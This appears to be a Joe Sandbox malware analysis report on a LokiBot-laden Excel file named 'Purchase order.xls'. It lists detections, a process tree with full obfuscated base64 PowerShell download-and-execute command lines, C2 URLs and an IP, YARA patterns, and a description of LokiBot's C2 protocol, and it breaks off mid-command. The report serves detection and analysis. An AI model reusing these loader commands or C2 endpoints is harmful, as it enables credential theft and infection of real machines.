Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase order.xls

Overview

General Information

Sample name:Purchase order.xls
Analysis ID:1542327
MD5:a8e1c0126304e8d65c0a30873dc3d830
SHA1:a0b52e51d227a126c1bc85b057482a58b028ed88
SHA256:c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b
Tags:xlsuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3556 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3848 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3944 cmdline: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 4056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3316 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 1960 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 2640 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 1668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_regbrowsers.exe (PID: 3900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: 04AA198D72229AEED129DC20201BF030)
    • mshta.exe (PID: 3164 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1488 cmdline: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 1944 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 2520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 2836 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" MD5: 045451FA238A75305CC26AC982472367)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.220/simple/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 9 entries
          SourceRuleDescriptionAuthorStrings
          26.2.aspnet_regbrowsers.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            26.2.aspnet_regbrowsers.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              26.2.aspnet_regbrowsers.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                26.2.aspnet_regbrowsers.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                26.2.aspnet_regbrowsers.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 11 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5k
